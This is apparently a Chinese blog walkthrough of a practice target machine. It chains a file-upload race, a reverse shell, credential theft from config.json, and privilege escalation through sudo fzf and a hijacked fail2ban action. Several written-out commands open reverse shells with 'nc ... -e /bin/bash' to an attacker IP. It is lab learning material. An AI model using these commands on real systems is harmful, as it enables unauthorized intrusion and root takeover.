靶机渗透日记

最新推荐文章于 2025-05-31 19:37:45 发布
最新推荐文章于 2025-05-31 19:37:45 发布
阅读量400 收藏
点赞数
文章标签: web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_47709391/article/details/123689346
版权

  1. 端口

    在这里插入图片描述

  2. 访问 80 端口

    在这里插入图片描述

    文件上传功能,上传php文件

    在这里插入图片描述

  3. 目录扫描

    在这里插入图片描述

    访问 /uploads 提示 403 ,但是可以访问到上传的文件

  4. 再次上传文件

    在这里插入图片描述

    发现延迟了3s,猜测是等待了3s后对文件变更名字,可以尝试在这3s内不断访问该文件

  5. 创建脚本,并上传反弹shell

    #!/bin/bash
while true
do
        curl "http://192.168.0.139/uploads/shell.php"
done

    成功反弹

    在这里插入图片描述

  6. 在 /opt/gancio 目录下存在 config.json ,其中包含数据库的账号密码

    在这里插入图片描述

  7. 连接数据库

    在这里插入图片描述

    得到两个密码hash,爆破得到密码 genesis

    在这里插入图片描述

    用户信息

    在这里插入图片描述

  8. 切换到connor用户,执行sudo -l

    在这里插入图片描述

    把 fzf 文件下载到本地分析

    在这里插入图片描述

    访问 https://github.com/junegunn/fzf/ ,可以得知 fzf 是一个命令行模糊查找器

    在这里插入图片描述

    _fzf_comprun()函数可以执行命令

    sudo -u john /usr/bin/fzf --preview 'nc 192.168.0.128 4445 -e /bin/bash'

    在这里插入图片描述

  9. 继续执行sudo -l

    在这里插入图片描述

    **Fail2Ban **是一个入侵检测系统框架,它可以保护电脑服务器免受暴力破解攻击。

    在这里插入图片描述

    创建防火墙规则

    echo "nc 192.168.0.128 4447 -e /bin/bash" > /tmp/iptables
chmod +x iptables

    修改fail2ban的配置文件 /etc/fail2ban/action.d/iptables-common.conf

    在这里插入图片描述

    重新启动 fail2ban

    sudo -u root /usr/bin/systemctl restart fail2ban

  10. 爆破 ssh ,本地监听 4447 端口

    在这里插入图片描述

# .
关注
通过fail2ban使服务器成获得额外的安全
心生于物而死于物
08-08 656
Fail2Ban 打出服务器安全的组合拳 [code="shell"]sudo apt-get update sudo apt-get install fail2ban[/code] 安装完后服务会自动启动, 该服务的fail2ban保持在它的配置文件/etc/fail2ban目录。 有一个与默认称为文件jail.conf 。 由于此文件可以通过软件包升级进行修改,因此我们...
靶机渗透日记 messages
Anonymous
02-26 406
IP 端口 访问 80 端口 两个功能点,一个是 chatbot ,一个是 Webmail 对这两部分进行目录扫描 发现在 /chatbot 目录下存在 后台登陆页面 寻找源码,关键字 Simple ChatBot Application 得到后台的默认密码,成功访问 登录到后台发现可以上传头像,上传一个 webshell ,这里上传一句话发现怎么都无法连接,并且我只能上传到 user_avatar ,上传到 bot_avatar 上会变成 jsp 后缀文件 在 /h..
靶机渗透日记 controller
Anonymous
02-25 1920
IP 端口 目录扫描 发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来 访问80端口 文档说明我们可以上传一个项目,并可以被运行 服务器还开放了 139,445 端口,访问 SMB 服务 可以匿名访问 上传 shell.txt import commands commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/t..
web安全攻防渗透测试实训笔记
m0_65385236的博客
04-07 1559
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
记一次猫舍由外到内的渗透撞库操作提取-flag
m0_65606241的博客
06-06 1414
猫舍靶场由外网打点进入内网后通过内网漏洞提权做撞库操作,最后拿到我们需要的成果
废物的靶场日记 hackthebox-Paper
m0_53302733的博客
03-24 1593
废物的靶场日记 hackthebox-Paper 今天做的是easy难度的paper 靶机IP 10.10.11.143 前渗透 信息收集 nmap -sV -A 10.10.11.143 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) 443/tcp open ssl/http Apa
CTF夺旗训练日记--SSH私钥泄露
weixin_41607190的博客
03-29 477
环境配置:VM-Workstation 15pro 直接将镜像压缩包拖到vm虚拟机的列表中 选取路径保存系统镜像 然后就可以启动开始渗透了 这里用的是nat模式 先进行主机发现 netdiscover -r 192.168.133.0/24 成功发现一个ip地址为 192.168.133.129 的靶机 查看开放的端口 nmap -sV 192.168.133.129 用dirb探测网站的隐藏...
Web安全测试-文件上传绕过-DVWA
lza20001103的博客
05-27 402
Web安全测试-文件上传绕过-DVWA
现代网络安全攻防技术与发展现状
最新发布
2301_80338712的博客
05-31 648
随着数字化转型进程的加速,全球信息化程度不断深入,网络安全问题日益凸显。根据最新的统计数据,2022年全球范围内的网络攻击事件较前一年增长了约41%,造成的经济损失高达超过6万亿美元。在这个背景下,了解现代黑客技术的发展态势及特点,对于构建有效的网络防御体系具有重要意义。本文将结合我们在CyberShield攻防模拟平台的实践经验,从技术层面深入分析当前黑客攻击的方法、工具与趋势,并探讨相应的防御策略。这是我自己模拟的一个系统网络。
关于Web安全:7. WebShell 管理与持久化后门
Triste__chengxi的博客
05-28 1199
项目菜刀马蚁剑马冰蝎马通信协议明文/RC4AES/Base64AES-CBC加密强度弱中强是否落地是是可无落地(内存马)控制强度中强极强检测难度容易中难插件功能普通丰富非常丰富支持语言多种多种 + 内存注入。
如何保护网络免受零日漏洞攻击?
endpointcentral的博客
05-27 1150
它自动化了完整的终端管理生命周期,从简单的系统配置到复杂的软件部署。IT安全是另一个主要问题,许多易受攻击和未打补丁的设备面临恶意软件和漏洞利用的风险,但没有明确的方法来了解问题的总体规模或如何应对新的威胁。借助Endpoint Central,找到了一个单一、经济高效的解决方案,可以集成服务台所需的所有功能,包括远程支持、补丁管理、资产管理和软件部署。借助Endpoint Central的统一终端管理方法,能够相对轻松地执行所有移动配置、部署和安全管理任务,为客户提供更快、响应更快的服务。
【网络安全】轻量敏感路径扫描工具
等风来
05-25 465
本文介绍了一款基于Python的异步敏感路径扫描工具,用于高效检测网站敏感文件泄露风险。工具特点包括: 异步高效 - 采用asyncio/aiohttp实现并发扫描(默认20并发); 智能过滤 - 通过基准404页面比对和关键词匹配(如"404")减少误报; 全面覆盖 - 内置150+敏感路径规则,涵盖.git、.env、数据库文件等; 可视化交互 - 通过rich库实时显示进度条和彩色分类结果(200/重定向重点标记)。
Femap许可证与网络安全策略
m0_70164415的博客
05-27 446
同时,利用网络安全策略中的监控和审计功能,实时监控Femap软件的使用情况,及时发现并应对潜在的安全风险。在电磁仿真领域,由于涉及到大量的数据和复杂的计算过程,许可证的安全性和网络安全策略的重要性更加凸显。在电磁仿真领域,Femap作为一款领先的软件,其许可证的安全性和网络策略的重要性不言而喻。此外,Femap还提供了定期的安全更新和补丁,及时修复可能存在的安全漏洞,保障用户数据的安全性和完整性。每年许可的采购量和使用情况无法统计,不清楚许可的使用状态(在用,过期,报废,闲置,未安装……
网络安全实训平台的设计与建设方案
whwzzc的博客
05-29 783
系统借助虚拟化技术构建高度仿真的实战场景,深度融合主流 CTF 赛事与攻防混战赛模式,配备丰富的竞赛资源与专业题库,能够全面、精准地评估选手的基础知识储备与实战技能水平,切实达成 “以赛促学、以赛促练” 的目标。这些资源形式丰富,涵盖教材、视频讲义、实验手册、项目指导书等多种类型,为教学活动和实验项目的开展提供了坚实的支撑。数据层承担着存储和管理平台运行过程中产生的各类数据的重任,这些数据涵盖学习记录数据、考试成绩数据、竞赛解题数据、演练过程数据、网络流量信息、任务信息、进程信息等。
2025年北京市职工职业技能大赛第六届信息通信行业网络安全技能大赛复赛CTF部分WP-哥斯拉流量分析
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
05-28 1119
题目没有任何提示,附件gzl.pcap解题哥斯拉流量300多KB包很多,没啥经验只能挨个看回来之后又狠狠得撸了一把哥斯拉流量分析我这里用的是哥斯拉4.0.1测试链接这里发了两个包,我们进行分析。
四、web安全-行业术语
bronze_s的博客
05-27 1311
多个网络安全行业术语
中车靶场,网络安全暑期实训营
wanganshiji01的博客
05-27 384
在有趣的攻防对抗中参与全流程协作,全面、高效实现能力提升。为确保高效实训,学员需具备一定的实战基础。接入中车工业互联网靶场,涵盖电力/轨交/水务等5大行业场景,部署真实PLC系统及网络设备,10大知识域,全面掌握网络安全总体知识架构,建立攻防理论基础,学习后参与考试取证。聚焦web、操作系统、中间件、数据库渗透实操,深化实战训练,学习后参与考试取证。中车安全专家+网安世纪金牌讲师双轨护航,深度参与央企真实项目。网络攻防理论,为线下实训构建完整知识体系准备。提升实战能力,直通就业快道。不善攻防,何谈就业?
web安全开发,在线%机器学习异常流量检测系统%开发demo
Strategic__的博客
05-31 334
这是一个响应式的 H5 页面,适用于手机端和电脑端,平板,各种小程序。这个demo最后我折中一下用uniapp写。回归正事之前我们把大模型细分化,分别训练不同细分类的检测方式,当然肯定有小伙伴有疑问,如果我们每一种攻击都训练,这样我们开销会不会很大,到时候不同小模型组合成大模型会不会麻烦等问题,如果我们要细分不同检查方式只能这样来,常见的有各种隧道中恶意的,加密的,异常流量,网站层面web渗透常见payload,webshell,以及软件层面pe,elf,apk,还有固件的检测等咱们都要把它们细分。
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值